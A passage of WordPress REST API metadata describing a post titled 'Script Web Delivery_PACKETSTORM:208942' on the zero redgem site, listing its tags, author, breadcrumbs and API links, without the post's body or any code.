Delivery_PACKETSTORM:208942","datePublished":"2025-08-28T11:48:29+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=14814"},"wordCount":1890,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=14814#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=14814","url":"https:\/\/zero.redgem.net\/?p=14814","name":"\ud83d\udcc4 Script Web Delivery_PACKETSTORM:208942 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-08-28T11:48:29+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=14814#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=14814"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=14814#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Script Web Delivery_PACKETSTORM:208942"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/14814","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14814"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/14814\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14814"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14814"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14814"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}